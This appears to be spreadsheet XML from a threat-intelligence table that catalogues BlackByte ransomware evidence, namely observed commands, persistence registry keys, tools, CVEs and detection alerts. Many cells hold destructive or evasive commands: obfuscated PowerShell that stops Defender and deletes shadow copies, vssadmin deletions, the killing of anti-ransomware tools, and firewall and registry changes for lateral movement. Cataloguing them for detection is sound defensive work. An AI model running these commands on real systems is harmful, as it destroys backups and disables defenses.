    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0021"/>
    <x v="0"/>
    <x v="0"/>
    <s v="reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0022"/>
    <x v="0"/>
    <x v="0"/>
    <s v="reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0023"/>
    <x v="0"/>
    <x v="0"/>
    <s v="reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0024"/>
    <x v="2"/>
    <x v="0"/>
    <s v="netsh advfirewall firewall set rule group=”Network Discovery” new enable=Yes"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0025"/>
    <x v="2"/>
    <x v="0"/>
    <s v="netsh advfirewall firewall set rule group=”File and Printer Sharing” new enable=Yes"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0026"/>
    <x v="1"/>
    <x v="0"/>
    <s v="cmd.exe /c powershell -command &quot;$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('VwBpA'+'G4ARAB'+'lAGYA'+'ZQB'+'uAG'+'QA'));Stop-Service -Name $x;Set-Service -StartupType Disabled $x&quot;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0027"/>
    <x v="0"/>
    <x v="0"/>
    <s v="schtasks.exe /DELETE /TN &quot;\&quot;Raccine Rules Updater\&quot;&quot; /F"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0028"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0029"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0030"/>
    <x v="0"/>
    <x v="0"/>
    <s v="powershell.exe $x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg'+'AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA'+'F8ALgBEAGUAbABlAHQAZQAoACkAwB9AA=='));Invoke-Expression $x"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0031"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config SQLTELEMETRY start= disabled"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0032"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config SQLTELEMETRY$ECWDB2 start= disabled"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0033"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config SQLWriter start= disabled"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0034"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config SstpSvc start= disabled"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0035"/>
    <x v="0"/>
    <x v="0"/>
    <s v="powershell.exe Set-MpPreference -EnableControlledFolderAccess Disabled"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0036"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config MBAMService start= disabled"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0037"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config wuauserv start= disabled"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0038"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config Dnscache start= auto"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0039"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config fdPHost start= auto"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0040"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config FDResPub start= auto"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0041"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config SSDPSRV start= auto"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0042"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config upnphost start= auto"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0043"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config RemoteRegistry start= auto"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0044"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmd.exe /c netsh advfirewall firewall set rule &quot;group=\&quot;Network Discovery\&quot;&quot; new enable=Yes"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0045"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmd.exe /c netsh advfirewall firewall set rule &quot;group=\&quot;File and Printer Sharing\&quot;&quot; new enable=Yes"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0046"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0047"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0048"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0049"/>
    <x v="0"/>
    <x v="0"/>
    <s v="mountvol.exe A: \\?\Volume{d7e47829-0000-0000-0000-100000000000}\"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0050"/>
    <x v="0"/>
    <x v="0"/>
    <s v="mountvol.exe B: \\?\Volume{d7e47829-0000-0000-0000-b0e213000000}\"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0051"/>
    <x v="0"/>
    <x v="0"/>
    <s v="mountvol.exe E: \\?\Volume{fce79ce0-b01f-11e6-b968-806e6f6e6963}\"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0052"/>
    <x v="0"/>
    <x v="0"/>
    <s v="powershell.exe Install-WindowsFeature -Name \&quot;RSAT-AD-PowerShell\&quot; –IncludeAllSubFeature"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0053"/>
    <x v="2"/>
    <x v="0"/>
    <s v="net.exe view"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0054"/>
    <x v="0"/>
    <x v="0"/>
    <s v="arp.exe -a"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0055"/>
    <x v="0"/>
    <x v="0"/>
    <s v="powershell.exe Import-Module ActiveDirectory;Get-ADComputer -Filter * -Properties * | FT Name"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0056"/>
    <x v="0"/>
    <x v="0"/>
    <s v="notepad.exe %appdata%\RestoreMyFiles_BlackByte.txt"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0057"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmd.exe /c ping 1.1.1.1 -n 10 &gt; Nul &amp; Del C:\Users\REM\Desktop\hybrid-9-8\complex.exe"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0058"/>
    <x v="1"/>
    <x v="0"/>
    <s v="powershell.exe $x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg'+'AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA'+'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='));Invoke-Expression $x"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0059"/>
    <x v="0"/>
    <x v="0"/>
    <s v="Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0060"/>
    <x v="1"/>
    <x v="0"/>
    <s v="cmd.exe /c powershell -command &quot;$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('VwBpA'+'G4ARAB'+'lAGYA'+'ZQB'+'uAG'+'QA'));Stop-Service -Name $x;Set-Service -StartupType Disabled $x&quot;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbyte-eid0061"/>
    <x v="0"/>
    <x v="1"/>
    <s v="ProxyShell vulnerabilities CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbyte-eid0062"/>
    <x v="0"/>
    <x v="1"/>
    <s v="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run _x000a_MsEdgeMsE_x000a_rundll32 C:\Users\user\Downloads\api-msvc.dll,Default"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbyte-eid0063"/>
    <x v="0"/>
    <x v="1"/>
    <s v="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run _x000a_MsEdgeMsE_x000a_rundll32 C:\temp\api-msvc.dll,Default"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbyte-eid0064"/>
    <x v="0"/>
    <x v="1"/>
    <s v="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run_x000a_MsEdgeMsE_x000a_rundll32 C:\systemtest\api-system.png,Default"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbyte-eid0065"/>
    <x v="3"/>
    <x v="1"/>
    <s v="C:\systemtest\anydesk\AnyDesk.exe_x000a_C:\Program Files (x86)\AnyDesk\AnyDesk.exe_x000a_C:\Scripts\AnyDesk.exe"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbyte-eid0066"/>
    <x v="4"/>
    <x v="2"/>
    <s v="netscan.exe"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbyte-eid0067"/>
    <x v="0"/>
    <x v="2"/>
    <s v="netapp.exe"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbyte-eid0068"/>
    <x v="0"/>
    <x v="2"/>
    <s v="ExByte"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbyte-eid0069"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbyte-eid0070"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbyte-eid0071"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmd /c reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbyte-eid0072"/>
    <x v="0"/>
    <x v="3"/>
    <s v="Trojan:Win32/Kovter!MSR_x000a_Trojan:Win64/WinGoObfusc.LK!MT_x000a_Trojan:Win64/BlackByte!MSR_x000a_HackTool:Win32/AdFind!MSR_x000a_Trojan:Win64/CobaltStrike!MSR"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbyte-eid0073"/>
    <x v="0"/>
    <x v="4"/>
    <s v="‘CVE-2021-31207’ exploit malware was detected_x000a_An active ‘NetShDisableFireWall’ malware in a command line was prevented from executing._x000a_Suspicious registry modification._x000a_‘Rtcore64’ hacktool was detected_x000a_Possible ongoing hands-on-keyboard activity (Cobalt Strike)_x000a_A file or network connection related to a ransomware-linked emerging threat activity group detected_x000a_Suspicious sequence of exploration activities_x000a_A process was injected with potentially malicious code_x000a_Suspicious behavior by cmd.exe was observed_x000a_‘Blackbyte’ ransomware was detected"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbyte-eid0074"/>
    <x v="0"/>
    <x v="0"/>
    <s v="taskill.exe /F /IM Raccine.exe"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0075"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cscript.exe &lt;malicious JScript launcher&gt;"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0076"/>
    <x v="0"/>
    <x v="0"/>
    <s v="taskill.exe /F /IM RaccineSettings.exe"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0077"/>
    <x v="0"/>
    <x v="0"/>
    <s v="schtasks.exe /DELETE /TN \&quot;Raccine Rules Updater\&quot; /F"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0078"/>
    <x v="0"/>
    <x v="0"/>
    <s v="HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name = “Raccine Tray”"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0079"/>
    <x v="0"/>
    <x v="0"/>
    <s v="HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0080"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config SQLTELEMETRY start = disabled"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0081"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config sc SQLTELEMETRY$ECWDB2 start = disabled"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0082"/>
    <x v="0"/>
    <x v="0"/>
    <s v="c.exe config SQLWriter start = disabled"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0083"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config SstpSvc start = disabled"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0084"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config MBAMService start = disabled"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0085"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sc.exe config wuauserv start = disabled"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0086"/>
    <x v="0"/>
    <x v="0"/>
    <s v="vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=401MB"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0087"/>
    <x v="0"/>
    <x v="0"/>
    <s v="vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=unbounded"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0088"/>
    <x v="5"/>
    <x v="0"/>
    <s v="vssadmin.exe Delete Shadows /all /quiet"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0089"/>
    <x v="0"/>
    <x v="0"/>
    <s v="powershell.exe Get-CimInstance Win32_ShadowCopy | Remove-CimInstance"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0090"/>
    <x v="0"/>
    <x v="0"/>
    <s v="powershell.exe Set-MpPreference -EnableControlledFolderAccess Disabled"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0091"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmd.exe /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0092"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmd.exe /c rd /s /q D:\\$Recycle.bin"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0093"/>
    <x v="2"/>
    <x v="0"/>
    <s v="netsh advfirewall firewall set rule group=&quot;Network Discovery” new enable=Yes"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0094"/>
    <x v="2"/>
    <x v="0"/>
    <s v="netsh advfirewall firewall set rule group=&quot;File and Printer Sharing&quot; new enable=Yes"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0095"/>
    <x v="0"/>
    <x v="0"/>
    <s v="powershell.exe Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0096"/>
    <x v="0"/>
    <x v="0"/>
    <s v="schtasks.exe &lt;remotehost&gt; /TN joke /TR \&quot;wscript.exe C:\\Users\\Public\\obamka.js\&quot; /sc once /st 00:00 /RL HIGHEST"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="blackbyte-eid0097"/>
    <x v="0"/>
    <x v="0"/>
    <s v="schtasks.exe /S &lt;remotehost&gt; /Run /TN joke"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AF15F0-3767-5941-9688-522010B44716}" name="PivotTable4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/>
  <pivotFields count="6">
    <pivotField showAll="0"/>
    <pivotField dataField="1" showAll="0">
      <items count="7">
        <item x="3"/>
        <item x="4"/>
        <item x="2"/>
        <item x="1"/>
        <item x="5"/>
        <item x="0"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField dataField="1" showAll="0">
      <items count="6">
        <item x="0"/>
        <item x="1"/>
        <item x="2"/>
        <item x="4"/>
        <item x="3"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="5">
        <item x="1"/>
        <item x="3"/>
        <item x="0"/>
        <item x="2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map_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of eid_typ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F98" totalsRowShown="0" dataDxfId="6">
  <autoFilter ref="A1:F98" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
  <tableColumns count="6">
    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="5"/>
    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="4"/>
    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="3"/>
    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="2"/>
    <tableColumn id="2" xr3:uid="{794120D3-18F6-5949-81E6-52D88B752F29}" name="description" dataDxfId="1"/>
    <tableColumn id="5" xr3:uid="{85834C32-2D65-CD48-92FE-AB72134D121E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F98"/>
  <sheetViews>
    <sheetView topLeftCell="A2" workbookViewId="0">
      <selection activeCell="B90" sqref="B90"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="18" customWidth="1"/>
    <col min="2" max="2" width="21.5" customWidth="1"/>
    <col min="3" max="3" width="13.6640625" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="143.33203125" customWidth="1"/>
    <col min="5" max="5" width="61" customWidth="1"/>
    <col min="6" max="6" width="147.164062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3</v>
      </c>
      <c r="E1" t="s">
        <v>2</v>
      </c>
      <c r="F1" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="2" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A2" s="1" t="s">
        <v>9</v>
      </c>
      <c r="B2" s="1"/>
      <c r="C2" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>106</v>
      </c>
      <c r="E2" s="1" t="s">
        <v>107</v>
      </c>
      <c r="F2" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="3" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A3" s="1" t="s">
        <v>10</v>
      </c>
      <c r="B3" s="1"/>
      <c r="C3" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>109</v>
      </c>
      <c r="E3" s="1"/>
      <c r="F3" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="4" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A4" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B4" s="1"/>
      <c r="C4" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>110</v>
      </c>
      <c r="E4" s="1" t="s">
        <v>111</v>
      </c>
      <c r="F4" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="5" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A5" s="1" t="s">
        <v>12</v>
      </c>
      <c r="B5" s="1"/>
      <c r="C5" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>112</v>
      </c>
      <c r="E5" s="1"/>
      <c r="F5" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="6" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A6" s="1" t="s">
        <v>13</v>
      </c>
      <c r="B6" s="1"/>
      <c r="C6" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>113</v>
      </c>
      <c r="E6" s="1"/>
      <c r="F6" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="7" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A7" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B7" s="1"/>
      <c r="C7" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>114</v>
      </c>
      <c r="E7" s="1"/>
      <c r="F7" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="8" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A8" s="1" t="s">
        <v>15</v>
      </c>
      <c r="B8" s="1"/>
      <c r="C8" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>115</v>
      </c>
      <c r="E8" s="1"/>
      <c r="F8" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="9" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A9" s="1" t="s">
        <v>16</v>
      </c>
      <c r="B9" s="1"/>
      <c r="C9" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>116</v>
      </c>
      <c r="E9" s="1"/>
      <c r="F9" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="10" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A10" s="1" t="s">
        <v>17</v>
      </c>
      <c r="B10" s="1"/>
      <c r="C10" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>117</v>
      </c>
      <c r="E10" s="1"/>
      <c r="F10" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="11" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A11" s="1" t="s">
        <v>18</v>
      </c>
      <c r="B11" s="1"/>
      <c r="C11" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>118</v>
      </c>
      <c r="E11" s="1"/>
      <c r="F11" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="12" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A12" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B12" s="1" t="s">
        <v>208</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>119</v>
      </c>
      <c r="E12" s="1"/>
      <c r="F12" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="13" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A13" s="1" t="s">
        <v>20</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>208</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>120</v>
      </c>
      <c r="E13" s="1"/>
      <c r="F13" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="14" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A14" s="1" t="s">
        <v>21</v>
      </c>
      <c r="B14" s="1"/>
      <c r="C14" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>121</v>
      </c>
      <c r="E14" s="1"/>
      <c r="F14" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="15" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A15" s="1" t="s">
        <v>22</v>
      </c>
      <c r="B15" s="1"/>
      <c r="C15" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>122</v>
      </c>
      <c r="E15" s="1"/>
      <c r="F15" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="16" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A16" s="1" t="s">
        <v>23</v>
      </c>
      <c r="B16" s="1"/>
      <c r="C16" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>123</v>
      </c>
      <c r="E16" s="1"/>
      <c r="F16" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="17" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A17" s="1" t="s">
        <v>24</v>
      </c>
      <c r="B17" s="1"/>
      <c r="C17" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D17" s="1" t="s">
        <v>124</v>
      </c>
      <c r="E17" s="1"/>
      <c r="F17" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="18" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A18" s="1" t="s">
        <v>25</v>
      </c>
      <c r="B18" s="1"/>
      <c r="C18" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>125</v>
      </c>
      <c r="E18" s="1"/>
      <c r="F18" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="19" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A19" s="1" t="s">
        <v>26</v>
      </c>
      <c r="B19" s="1"/>
      <c r="C19" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>106</v>
      </c>
      <c r="E19" s="1"/>
      <c r="F19" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="20" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A20" s="1" t="s">
        <v>27</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>208</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>126</v>
      </c>
      <c r="E20" s="1"/>
      <c r="F20" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="21" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A21" s="1" t="s">
        <v>28</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>208</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>127</v>
      </c>
      <c r="E21" s="1"/>
      <c r="F21" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="22" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A22" s="1" t="s">
        <v>29</v>
      </c>
      <c r="B22" s="1"/>
      <c r="C22" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>128</v>
      </c>
      <c r="E22" s="1"/>
      <c r="F22" s="1" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="23" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A23" s="1" t="s">
        <v>30</v>
      </c>
      <c r="B23" s="1"/>
      <c r="C23" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>129</v>
      </c>
      <c r="E23" s="1"/>
      <c r="F23" s="1" t="s">
